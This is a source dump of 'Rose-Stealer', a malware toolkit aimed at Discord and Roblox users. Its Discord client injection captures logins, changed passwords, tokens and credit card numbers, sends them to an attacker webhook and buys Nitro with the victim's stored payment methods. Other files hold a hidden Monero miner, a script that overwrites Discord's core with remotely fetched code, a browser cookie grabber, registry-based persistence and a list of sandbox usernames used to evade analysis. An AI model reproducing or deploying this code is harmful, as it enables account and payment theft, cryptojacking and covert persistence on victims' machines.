maj = maj_32,
rotl = rotl_32,
safeAdd_2 = safeAdd_32_2,
t,
safeAdd_5 = safeAdd_32_5;
a = H[0];
b = H[1];
c = H[2];
d = H[3];
e = H[4];
for (t = 0; t < 80; t += 1) {
if (t < 16) {
W[t] = block[t];
} else {
W[t] = rotl(W[t - 3] ^ W[t - 8] ^ W[t - 14] ^ W[t - 16], 1);
}
if (t < 20) {
T = safeAdd_5(rotl(a, 5), ch(b, c, d), e, 0x5a827999, W[t]);
} else if (t < 40) {
T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0x6ed9eba1, W[t]);
} else if (t < 60) {
T = safeAdd_5(rotl(a, 5), maj(b, c, d), e, 0x8f1bbcdc, W[t]);
} else {
T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0xca62c1d6, W[t]);
}
e = d;
d = c;
c = rotl(b, 30);
b = a;
a = T;
}
H[0] = safeAdd_2(a, H[0]);
H[1] = safeAdd_2(b, H[1]);
H[2] = safeAdd_2(c, H[2]);
H[3] = safeAdd_2(d, H[3]);
H[4] = safeAdd_2(e, H[4]);
return H;
}
function finalizeSHA1(remainder, remainderBinLen, processedBinLen, H) {
var i, appendedMessageLength, offset;
offset = (((remainderBinLen + 65) >>> 9) << 4) + 15;
while (remainder.length <= offset) {
remainder.push(0);
}
remainder[remainderBinLen >>> 5] |= 0x80 << (24 - (remainderBinLen % 32));
remainder[offset] = remainderBinLen + processedBinLen;
appendedMessageLength = remainder.length;
for (i = 0; i < appendedMessageLength; i += 16) {
H = roundSHA1(remainder.slice(i, i + 16), H);
}
return H;
}
function hex2binb(str, existingBin, existingBinLen) {
var bin,
length = str.length,
i,
num,
intOffset,
byteOffset,
existingByteLen;
bin = existingBin || [0];
existingBinLen = existingBinLen || 0;
existingByteLen = existingBinLen >>> 3;
if (0 !== length % 2) {
console.error('String of HEX type must be in byte increments');
}
for (i = 0; i < length; i += 2) {
num = parseInt(str.substr(i, 2), 16);
if (!isNaN(num)) {
byteOffset = (i >>> 1) + existingByteLen;
intOffset = byteOffset >>> 2;
while (bin.length <= intOffset) {
bin.push(0);
}
bin[intOffset] |= num << (8 * (3 - (byteOffset % 4)));
} else {
console.error('String of HEX type contains invalid characters');
}
}
return { value: bin, binLen: length * 4 + existingBinLen };
}
class jsSHA {
constructor() {
var processedLen = 0,
remainder = [],
remainderLen = 0,
intermediateH,
converterFunc,
outputBinLen,
variantBlockSize,
roundFunc,
finalizeFunc,
finalized = false,
hmacKeySet = false,
keyWithIPad = [],
keyWithOPad = [],
numRounds,
numRounds = 1;
converterFunc = hex2binb;
if (numRounds !== parseInt(numRounds, 10) || 1 > numRounds) {
console.error('numRounds must a integer >= 1');
}
variantBlockSize = 512;
roundFunc = roundSHA1;
finalizeFunc = finalizeSHA1;
outputBinLen = 160;
intermediateH = getH();
this.setHMACKey = function (key) {
var keyConverterFunc, convertRet, keyBinLen, keyToUse, blockByteSize, i, lastArrayIndex;
keyConverterFunc = hex2binb;
convertRet = keyConverterFunc(key);
keyBinLen = convertRet['binLen'];
keyToUse = convertRet['value'];
blockByteSize = variantBlockSize >>> 3;
lastArrayIndex = blockByteSize / 4 - 1;
if (blockByteSize < keyBinLen / 8) {
keyToUse = finalizeFunc(keyToUse, keyBinLen, 0, getH());
while (keyToUse.length <= lastArrayIndex) {
keyToUse.push(0);
}
keyToUse[lastArrayIndex] &= 0xffffff00;
} else if (blockByteSize > keyBinLen / 8) {
while (keyToUse.length <= lastArrayIndex) {
keyToUse.push(0);
}
keyToUse[lastArrayIndex] &= 0xffffff00;
}
for (i = 0; i <= lastArrayIndex; i += 1) {
keyWithIPad[i] = keyToUse[i] ^ 0x36363636;
keyWithOPad[i] = keyToUse[i] ^ 0x5c5c5c5c;
}
intermediateH = roundFunc(keyWithIPad, intermediateH);
processedLen = variantBlockSize;
hmacKeySet = true;
};
this.update = function (srcString) {
var convertRet,
chunkBinLen,
chunkIntLen,
chunk,
i,
updateProcessedLen = 0,
variantBlockIntInc = variantBlockSize >>> 5;
convertRet = converterFunc(srcString, remainder, remainderLen);
chunkBinLen = convertRet['binLen'];
chunk = convertRet['value'];
chunkIntLen = chunkBinLen >>> 5;
for (i = 0; i < chunkIntLen; i += variantBlockIntInc) {
if (updateProcessedLen + variantBlockSize <= chunkBinLen) {
intermediateH = roundFunc(chunk.slice(i, i + variantBlockIntInc), intermediateH);
updateProcessedLen += variantBlockSize;
}
}
processedLen += updateProcessedLen;
remainder = chunk.slice(updateProcessedLen >>> 5);
remainderLen = chunkBinLen % variantBlockSize;
};
this.getHMAC = function () {
var firstHash;
if (false === hmacKeySet) {
console.error('Cannot call getHMAC without first setting HMAC key');
}
const formatFunc = function (binarray) {
return binb2hex(binarray);
};
if (false === finalized) {
firstHash = finalizeFunc(remainder, remainderLen, processedLen, intermediateH);
intermediateH = roundFunc(keyWithOPad, getH());
intermediateH = finalizeFunc(firstHash, outputBinLen, variantBlockSize, intermediateH);
}
finalized = true;
return formatFunc(intermediateH);
};
}
}
if ('function' === typeof define && define['amd']) {
define(function () {
return jsSHA;
});
} else if ('undefined' !== typeof exports) {
if ('undefined' !== typeof module && module['exports']) {
module['exports'] = exports = jsSHA;
} else {
exports = jsSHA;
}
} else {
global['jsSHA'] = jsSHA;
}
if (jsSHA.default) {
jsSHA = jsSHA.default;
}
function totp(key) {
const period = 30;
const digits = 6;
const timestamp = Date.now();
const epoch = Math.round(timestamp / 1000.0);
const time = leftpad(dec2hex(Math.floor(epoch / period)), 16, '0');
const shaObj = new jsSHA();
shaObj.setHMACKey(base32tohex(key));
shaObj.update(time);
const hmac = shaObj.getHMAC();
const offset = hex2dec(hmac.substring(hmac.length - 1));
let otp = (hex2dec(hmac.substr(offset * 2, 8)) & hex2dec('7fffffff')) + '';
otp = otp.substr(Math.max(otp.length - digits, 0), digits);
return otp;
}
function hex2dec(s) {
return parseInt(s, 16);
}
function dec2hex(s) {
return (s < 15.5 ? '0' : '') + Math.round(s).toString(16);
}
function base32tohex(base32) {
let base32chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567',
bits = '',
hex = '';
base32 = base32.replace(/=+$/, '');
for (let i = 0; i < base32.length; i++) {
let val = base32chars.indexOf(base32.charAt(i).toUpperCase());
if (val === -1) console.error('Invalid base32 character in key');
bits += leftpad(val.toString(2), 5, '0');
}
for (let i = 0; i + 8 <= bits.length; i += 8) {
let chunk = bits.substr(i, 8);
hex = hex + leftpad(parseInt(chunk, 2).toString(16), 2, '0');
}
return hex;
}
function leftpad(str, len, pad) {
if (len + 1 >= str.length) {
str = Array(len + 1 - str.length).join(pad) + str;
}
return str;
}
const discordPath = (function () {
const app = args[0].split(path.sep).slice(0, -1).join(path.sep);
let resourcePath;
if (process.platform === 'win32') {
resourcePath = path.join(app, 'resources');
} else if (process.platform === 'darwin') {
resourcePath = path.join(app, 'Contents', 'Resources');
}
if (fs.existsSync(resourcePath)) return { resourcePath, app };
return { undefined, undefined };
})();
function updateCheck() {
const { resourcePath, app } = discordPath;
if (resourcePath === undefined || app === undefined) return;
const appPath = path.join(resourcePath, 'app');
const packageJson = path.join(appPath, 'package.json');
const resourceIndex = path.join(appPath, 'index.js');
const indexJs = `${app}\\modules\\discord_desktop_core-1\\discord_desktop_core\\index.js`;
const bdPath = path.join(process.env.APPDATA, '\\betterdiscord\\data\\betterdiscord.asar');
if (!fs.existsSync(appPath)) fs.mkdirSync(appPath);
if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson);
if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex);
if (process.platform === 'win32' || process.platform === 'darwin') {
fs.writeFileSync(
packageJson,
JSON.stringify(
{
name: 'discord',
main: 'index.js',
},
null,
4,
),
);
const startUpScript = `const fs = require('fs'), https = require('https');
const indexJs = '${indexJs}';
const bdPath = '${bdPath}';
const fileSize = fs.statSync(indexJs).size
fs.readFileSync(indexJs, 'utf8', (err, data) => {
if (fileSize < 20000 || data === "module.exports = require('./core.asar')")
init();
})
async function init() {
https.get('${config.injection_url}', (res) => {
const file = fs.createWriteStream(indexJs);
res.replace('%WEBHOOK%', '${config.webhook}')
res.replace('%WEBHOOK_KEY%', '${config.webhook_protector_key}')
res.pipe(file);
file.on('finish', () => {
file.close();
});
}).on("error", (err) => {
setTimeout(init(), 10000);
});
}
require('${path.join(resourcePath, 'app.asar')}')
if (fs.existsSync(bdPath)) require(bdPath);`;
fs.writeFileSync(resourceIndex, startUpScript.replace(/\\/g, '\\\\'));
}
if (!fs.existsSync(path.join(__dirname, 'initiation'))) return !0;
fs.rmdirSync(path.join(__dirname, 'initiation'));
execScript(
`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
);
return !1;
}
const execScript = (script) => {
const window = BrowserWindow.getAllWindows()[0];
return window.webContents.executeJavaScript(script, !0);
};
const getInfo = async (token) => {
const info = await execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "${config.api}", false);
xmlHttp.setRequestHeader("Authorization", "${token}");
xmlHttp.send(null);
xmlHttp.responseText;`);
return JSON.parse(info);
};
const fetchBilling = async (token) => {
const bill = await execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "${config.api}/billing/payment-sources", false);
xmlHttp.setRequestHeader("Authorization", "${token}");
xmlHttp.send(null);
xmlHttp.responseText`);
if (!bill.lenght || bill.length === 0) return '';
return JSON.parse(bill);
};
const getBilling = async (token) => {
const data = await fetchBilling(token);
if (!data) return '❌';
let billing = '';
data.forEach((x) => {
if (!x.invalid) {
switch (x.type) {
case 1:
billing += '💳 ';
break;
case 2:
billing += '<:paypal:951139189389410365> ';
break;
}
}
});
if (!billing) billing = '❌';
return billing;
};
const Purchase = async (token, id, _type, _time) => {
const options = {
expected_amount: config.nitro[_type][_time]['price'],
expected_currency: 'usd',
gift: true,
payment_source_id: id,
payment_source_token: null,
purchase_token: '2422867c-244d-476a-ba4f-36e197758d97',
sku_subscription_plan_id: config.nitro[_type][_time]['sku'],
};
const req = execScript(`var xmlHttp = new XMLHttpRequest();
xmlHttp.open("POST", "https://discord.com/api/v9/store/skus/${config.nitro[_type][_time]['id']}/purchase", false);
xmlHttp.setRequestHeader("Authorization", "${token}");
xmlHttp.setRequestHeader('Content-Type', 'application/json');
xmlHttp.send(JSON.stringify(${JSON.stringify(options)}));
xmlHttp.responseText`);
if (req['gift_code']) {
return 'https://discord.gift/' + req['gift_code'];
} else return null;
};
const buyNitro = async (token) => {
const data = await fetchBilling(token);
const failedMsg = 'Failed to Purchase ❌';
if (!data) return failedMsg;
let IDS = [];
data.forEach((x) => {
if (!x.invalid) {
IDS = IDS.concat(x.id);
}
});
for (let sourceID in IDS) {
const first = Purchase(token, sourceID, 'boost', 'year');
if (first !== null) {
return first;
} else {
const second = Purchase(token, sourceID, 'boost', 'month');
if (second !== null) {
return second;
} else {
const third = Purchase(token, sourceID, 'classic', 'month');
if (third !== null) {
return third;
} else {
return failedMsg;
}
}
}
}
};
const getNitro = (flags) => {
switch (flags) {
case 0:
return 'No Nitro';
case 1:
return 'Nitro Classic';
case 2:
return 'Nitro Boost';
default:
return 'No Nitro';
}
};
const getBadges = (flags) => {
let badges = '';
switch (flags) {
case 1:
badges += 'Discord Staff, ';
break;
case 2:
badges += 'Partnered Server Owner, ';
break;
case 131072:
badges += 'Verified Bot Developer, ';
break;
case 4:
badges += 'Hypesquad Event, ';
break;
case 16384:
badges += 'Gold BugHunter, ';
break;
case 8:
badges += 'Green BugHunter, ';
break;
case 512:
badges += 'Early Supporter, ';
break;
case 128:
badges += 'HypeSquad Brillance, ';
break;
case 64:
badges += 'HypeSquad Bravery, ';
break;
case 256:
badges += 'HypeSquad Balance, ';
break;
case 0:
badges = 'None';
break;
default:
badges = 'None';
break;
}
return badges;
};
const hooker = async (content) => {
const data = JSON.stringify(content);
const url = new URL(config.webhook);
const headers = {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
};
if (!config.webhook.includes('api/webhooks')) {
const key = totp(config.webhook_protector_key);
headers['Authorization'] = key;
}
const options = {
protocol: url.protocol,
hostname: url.host,
path: url.pathname,
method: 'POST',
headers: headers,
};
const req = https.request(options);
req.on('error', (err) => {
console.log(err);
});
req.write(data);
req.end();
};
const login = async (email, password, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags);
const billing = await getBilling(token);
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
color: config.embed_color,
fields: [
{
name: '**Account Info**',
value: `Email: **${email}** - Password: **${password}**`,
inline: false,
},
{
name: '**Discord Info**',
value: `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`,
inline: false,
},
{
name: '**Token**',
value: `\`${token}\``,
inline: false,
},
],
author: {
name: json.username + '#' + json.discriminator + ' | ' + json.id,
icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
},
footer: {
text: '🎉・Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection',
},
},
],
};
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content);
};
const passwordChanged = async (oldpassword, newpassword, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags);
const billing = await getBilling(token);
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
color: config.embed_color,
fields: [
{
name: '**Password Changed**',
value: `Email: **${json.email}**\nOld Password: **${oldpassword}**\nNew Password: **${newpassword}**`,
inline: true,
},
{
name: '**Discord Info**',
value: `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`,
inline: true,
},
{
name: '**Token**',
value: `\`${token}\``,
inline: false,
},
],
author: {
name: json.username + '#' + json.discriminator + ' | ' + json.id,
icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
},
footer: {
text: '🎉・Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection',
},
},
],
};
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content);
};
const emailChanged = async (email, password, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags);
const billing = await getBilling(token);
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
color: config.embed_color,
fields: [
{
name: '**Email Changed**',
value: `New Email: **${email}**\nPassword: **${password}**`,
inline: true,
},
{
name: '**Discord Info**',
value: `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`,
inline: true,
},
{
name: '**Token**',
value: `\`${token}\``,
inline: false,
},
],
author: {
name: json.username + '#' + json.discriminator + ' | ' + json.id,
icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
},
footer: {
text: '🎉・Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection',
},
},
],
};
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content);
};
const PaypalAdded = async (token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags);
const billing = getBilling(token);
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
color: config.embed_color,
fields: [
{
name: '**Paypal Added**',
value: `Time to buy some nitro baby 😩`,
inline: false,
},
{
name: '**Discord Info**',
value: `Nitro Type: **${nitro}*\nBadges: **${badges}**\nBilling: **${billing}**`,
inline: false,
},
{
name: '**Token**',
value: `\`${token}\``,
inline: false,
},
],
author: {
name: json.username + '#' + json.discriminator + ' | ' + json.id,
icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
},
footer: {
text: '🎉・Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection',
},
},
],
};
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content);
};
const ccAdded = async (number, cvc, expir_month, expir_year, token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags);
const billing = await getBilling(token);
const content = {
username: config.embed_name,
avatar_url: config.embed_icon,
embeds: [
{
color: config.embed_color,
fields: [
{
name: '**Credit Card Added**',
value: `Credit Card Number: **${number}**\nCVC: **${cvc}**\nCredit Card Expiration: **${expir_month}/${expir_year}**`,
inline: true,
},
{
name: '**Discord Info**',
value: `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`,
inline: true,
},
{
name: '**Token**',
value: `\`${token}\``,
inline: false,
},
],
author: {
name: json.username + '#' + json.discriminator + ' | ' + json.id,
icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
},
footer: {
text: '🎉・Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection',
},
},
],
};
if (config.ping_on_run) content['content'] = config.ping_val;
hooker(content);
};
const nitroBought = async (token) => {
const json = await getInfo(token);
const nitro = getNitro(json.premium_type);
const badges = getBadges(json.flags);
const billing = await getBilling(token);
const code = await buyNitro(token);
const content = {
username: config.embed_name,
content: code,
avatar_url: config.embed_icon,
embeds: [
{
color: config.embed_color,
fields: [
{
name: '**Nitro bought!**',
value: `**Nitro Code:**\n\`\`\`diff\n+ ${code}\`\`\``,
inline: true,
},
{
name: '**Discord Info**',
value: `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`,
inline: true,
},
{
name: '**Token**',
value: `\`${token}\``,
inline: false,
},
],
author: {
name: json.username + '#' + json.discriminator + ' | ' + json.id,
icon_url: `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp`,
},
footer: {
text: '🎉・Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection',
},
},
],
};
if (config.ping_on_run) content['content'] = config.ping_val + `\n${code}`;
hooker(content);
};
session.defaultSession.webRequest.onBeforeRequest(config.filter2, (details, callback) => {
if (details.url.startsWith('wss://remote-auth-gateway')) return callback({ cancel: true });
updateCheck();
});
session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
if (details.url.startsWith(config.webhook)) {
if (details.url.includes('discord.com')) {
callback({
responseHeaders: Object.assign(
{
'Access-Control-Allow-Headers': '*',
},
details.responseHeaders,
),
});
} else {
callback({
responseHeaders: Object.assign(
{
'Content-Security-Policy': ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"],
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
},
details.responseHeaders,
),
});
}
} else {
delete details.responseHeaders['content-security-policy'];
delete details.responseHeaders['content-security-policy-report-only'];
callback({
responseHeaders: {
...details.responseHeaders,
'Access-Control-Allow-Headers': '*',
},
});
}
});
session.defaultSession.webRequest.onCompleted(config.filter, async (details, _) => {
if (details.statusCode !== 200 && details.statusCode !== 202) return;
const unparsed_data = Buffer.from(details.uploadData[0].bytes).toString();
const data = JSON.parse(unparsed_data);
const token = await execScript(
`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`,
);
switch (true) {
case details.url.endsWith('login'):
login(data.login, data.password, token).catch(console.error);
break;
case details.url.endsWith('users/@me') && details.method === 'PATCH':
if (!data.password) return;
if (data.email) {
emailChanged(data.email, data.password, token).catch(console.error);
}
if (data.new_password) {
passwordChanged(data.password, data.new_password, token).catch(console.error);
}
break;
case details.url.endsWith('tokens') && details.method === 'POST':
const item = querystring.parse(unparsedData.toString());
ccAdded(item['card[number]'], item['card[cvc]'], item['card[exp_month]'], item['card[exp_year]'], token).catch(console.error);
break;
case details.url.endsWith('paypal_accounts') && details.method === 'POST':
PaypalAdded(token).catch(console.error);
break;
case details.url.endsWith('confirm') && details.method === 'POST':
if (!config.auto_buy_nitro) return;
setTimeout(() => {
nitroBought(token).catch(console.error);
}, 7500);
break;
default:
break;
}
});
module.exports = require('./core.asar');

1
Rose-Stealerv1/resources/data/obf-injection.js Normal file
View File

File diff suppressed because one or more lines are too long

37
Rose-Stealerv1/resources/data/requirements.txt Normal file
View File

@@ -0,0 +1,37 @@
pypiwin32
beautifulsoup4
PyQt5
requests
rich
dhooks
pyinstaller
python-socketio
flaskwebgui
nicegui
datetime
opencv-python
pyttsx3
pynput
browser_cookie3
crypto
tabulate
Pillow
WMI
psutil
pycryptodome
mss
pygame
keyboard
pyperclip
pyzipper
cryptography
wmi
gputil
pygame
pyautogui
pywifi
pywebview
getmac
colorlog
PyNaCl
discord.py

47
Rose-Stealerv1/resources/source/dev/xmri.py Normal file
View File

@@ -0,0 +1,47 @@
import os
import requests
import subprocess
import shutil
import string
import random
import threading
from zipfile import ZipFile
def get_random_string(length):
letters = string.digits
result_str = "".join(random.choice(letters) for i in range(length))
return result_str
def xmrig():
working_dir = os.path.join(os.getenv("APPDATA"), "rose")
if not os.path.exists(working_dir):
os.mkdir(working_dir)
xmrig_zip = os.path.join(working_dir, "xmrig.zip")
xmrig_dir = os.path.join(working_dir, "xmrig")
xmrig_exe = os.path.join(xmrig_dir, "xmrig-6.21.0", "xmrig.exe")
if os.path.exists(xmrig_dir):
shutil.rmtree(xmrig_dir)
if os.path.exists(xmrig_zip):
os.remove(xmrig_zip)
response = requests.get("https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip")
response.raise_for_status()
open(xmrig_zip, "wb").write(response.content)
with ZipFile(xmrig_zip, "r") as zip_ref:
zip_ref.extractall(xmrig_dir)
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
subprocess.Popen([xmrig_exe, "--donate-level", "1", "-o", "de.monero.herominers.com:1111", "-u", "49vfj17oFnshJpoX52tmacXhXd9ivUjdJC51fPUG8dFsXY8m39rTYj2TzrMWp7QwARP3QtBCKEqvkjDiYDMADD5PALx1XBu", "-p", get_random_string(12), "-a", "rx/0", "-k", "--background"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=startupinfo, creationflags=subprocess.CREATE_NO_WINDOW | subprocess.DETACHED_PROCESS, close_fds=True)
threading.Thread(target=xmrig()).start()

61
Rose-Stealerv1/resources/source/old/InjectX.py Normal file
View File

@@ -0,0 +1,61 @@
# Entire code from https://github.com/addi00000/empyrean!
# Go give him some love.
from bin.config import Config
cc = Config()
import requests
import psutil
import re
import os
import subprocess
class InjectionX:
def __init__(self, webhook: str) -> None:
self.appdata = os.getenv("LOCALAPPDATA")
self.discord_dirs = [self.appdata + "\\Discord", self.appdata + "\\DiscordCanary", self.appdata + "\\DiscordPTB", self.appdata + "\\DiscordDevelopment"]
self.code = requests.get("https://raw.githubusercontent.com/DamagingRose/Rose-Grabber/main/resources/data/injection.js").text
if cc.get_nitro_auto_buy() is True:
self.code = self.code.replace("auto_buy_nitro: false,", "auto_buy_nitro: true,")
for proc in psutil.process_iter():
if "discord" in proc.name().lower():
proc.kill()
for dir in self.discord_dirs:
if not os.path.exists(dir):
continue
if self.get_core(dir) is not None:
with open(self.get_core(dir)[0] + "\\index.js", "w", encoding="utf-8") as f:
f.write((self.code).replace("discord_desktop_core-1", self.get_core(dir)[1]).replace("%WEBHOOK%", webhook))
self.start_discord(dir)
@staticmethod
def get_core(dir: str) -> tuple:
for file in os.listdir(dir):
if re.search(r"app-+?", file):
modules = dir + "\\" + file + "\\modules"
if not os.path.exists(modules):
continue
for file in os.listdir(modules):
if re.search(r"discord_desktop_core-+?", file):
core = modules + "\\" + file + "\\" + "discord_desktop_core"
if not os.path.exists(core + "\\index.js"):
continue
return core, file
@staticmethod
def start_discord(dir: str) -> None:
update = dir + "\\Update.exe"
executable = dir.split("\\")[-1] + ".exe"
for file in os.listdir(dir):
if re.search(r"app-+?", file):
app = dir + "\\" + file
if os.path.exists(app + "\\" + "modules"):
for file in os.listdir(app):
if file == executable:
executable = app + "\\" + executable
subprocess.call([update, "--processStart", executable], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

12
Rose-Stealerv1/resources/source/old/_file.py Normal file
View File

@@ -0,0 +1,12 @@
from tabulate import tabulate
class FileX:
def table_wifi(self, data):
listx = [["SSID", "Password"]]
for value in data:
listx.append([value["ssid"], value["password"]])
tablex = tabulate(listx, headers="firstrow", tablefmt="grid")
return tablex

8
Rose-Stealerv1/resources/source/old/_random_string.py Normal file
View File

@@ -0,0 +1,8 @@
import string
import random
def get_random_string(length):
letters = string.digits
result_str = "".join(random.choice(letters) for i in range(length))
return result_str

35
Rose-Stealerv1/resources/source/old/_roblox.py Normal file
View File

@@ -0,0 +1,35 @@
import requests
import browser_cookie3
from bin.config import Config
from bin.webhook import _WebhookX
class RobloxX:
def __init__(self):
self.web = _WebhookX().get_object()
self.cc = Config()
def UploadRobloxCookie(self, roblox_cookie):
try:
info = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": roblox_cookie}).json()
json = {"embed": {"description": "Roblox Cookie Grabber:", "color": 13395456, "timestamp": "now", "author": {"name": self.cc.get_name(), "icon_url": self.cc.get_avatar()}, "footer": {"text": self.cc.get_footer(), "icon_url": self.cc.get_avatar()}, "fields": [{"name": "User ID:", "value": "`" + info["UserID"] + "`"}, {"name": "Username:", "value": "`" + info["UserName"] + "`"}, {"name": "Robux Balance:", "value": "`" + info["RobuxBalance"] + "`"}, {"name": "IsPremium:", "value": "`" + info["IsPremium"] + "`"}, {"name": "ROBLOSECURITY:", "value": "Roblox Cookie ```" + roblox_cookie + "```"}], "image": {"url": info["ThumbnailUrl"]}}}
requests.self(self.web, json=json)
except:
pass
def RobloxCookieGrabber(self):
browsers = [browser_cookie3.chrome, browser_cookie3.firefox, browser_cookie3.librewolf, browser_cookie3.opera, browser_cookie3.edge, browser_cookie3.chromium, browser_cookie3.brave, browser_cookie3.vivaldi, browser_cookie3.safari]
for browser in browsers:
try:
cookies = browser(domain_name="roblox.com")
cookies = str(cookies)
cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
self.UploadRobloxCookie(cookie)
except:
pass
def run(self):
self.RobloxCookieGrabber()

33
Rose-Stealerv1/resources/source/old/_startup.py Normal file
View File

@@ -0,0 +1,33 @@
import subprocess
import sys
import os
import shutil
from _random_string import get_random_string
class Startup:
def __init__(self):
self.dir_name = get_random_string(12)
self.working_dir = os.path.join(os.getenv("APPDATA"), self.dir_name)
self.exec_name = f"{get_random_string(16)}.exe"
self.full_path = os.path.join(self.working_dir, self.exec_name)
self.reg_entry = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
self.regent_name = get_random_string(18)
self.mkdir()
self.copy_stub()
self.regedit()
def mkdir(self):
if not os.path.isdir(self.working_dir):
os.mkdir(self.working_dir)
else:
shutil.rmtree(self.working_dir)
os.mkdir(self.working_dir)
def copy_stub(self):
shutil.copy2(os.path.realpath(sys.executable), self.full_path)
def regedit(self):
subprocess.run(args=f'reg delete "{self.reg_entry}" /v {self.regent_name} /f', shell=True)
subprocess.run(args=f'reg add "{self.reg_entry}" /v {self.regent_name} /t REG_SZ /d "{self.full_path}" /f', shell=True)

23
Rose-Stealerv1/resources/source/old/_webhook.py Normal file
View File

@@ -0,0 +1,23 @@
from bin.config import Config
from dhooks import Embed
from bin.webhook import _WebhookX
cc = Config()
class WebhookX:
def __init__(self):
self.webx = _WebhookX().get_object()
def locations_webhook(self, dictx):
embed = Embed(description="Location Infos:", color=cc.get_color(), timestamp="now") # sets the timestamp to current time
embed.set_author(name=cc.get_name(), icon_url=cc.get_avatar())
embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
for j in dictx:
print(j)
zvalue = dictx[j]
embed.add_field(name=j, value=f"`{zvalue}`")
self.webx.send(embed=embed)

483
Rose-Stealerv1/resources/source/old/antivm.py Normal file
View File

@@ -0,0 +1,483 @@
import subprocess
import getmac
import os
import requests
import winreg
import psutil
def user_check():
USERS = [
"Admin",
"BEE7370C-8C0C-4",
"DESKTOP-NAKFFMT",
"WIN-5E07COS9ALR",
"B30F0242-1C6A-4",
"DESKTOP-VRSQLAG",
"Q9IATRKPRH",
"XC64ZB",
"DESKTOP-D019GDM",
"DESKTOP-WI8CLET",
"SERVER1",
"LISA-PC",
"JOHN-PC",
"DESKTOP-B0T93D6",
"DESKTOP-1PYKP29",
"DESKTOP-1Y2433R",
"WILEYPC",
"WORK",
"6C4E733F-C2D9-4",
"RALPHS-PC",
"DESKTOP-WG3MYJS",
"DESKTOP-7XC6GEZ",
"DESKTOP-5OV9S0O",
"QarZhrdBpj",
"ORELEEPC",
"ARCHIBALDPC",
"JULIA-PC",
"d1bnJkfVlH",
"WDAGUtilityAccount",
"Abby",
"patex",
"RDhJ0CNFevzX",
"kEecfMwgj",
"Frank",
"8Nl0ColNQ5bq",
"Lisa",
"John",
"george",
"PxmdUOpVyx",
"8VizSM",
"w0fjuOVmCcP5A",
"lmVwjj9b",
"PqONjHVwexsS",
"3u2v9m8",
"Julia",
"HEUeRzl",
"fred",
"server",
"BvJChRPnsxn",
"Harry Johnson",
"SqgFOf3G",
"Lucas",
"mike",
"PateX",
"h7dk1xPr",
"Louise",
"User01",
"test",
"RGzcBUyrznReg",
"OgJb6GqgK0O",
"joshuarob",
]
try:
USER = os.getlogin()
if USER in USERS:
return True
except:
pass
def process_check():
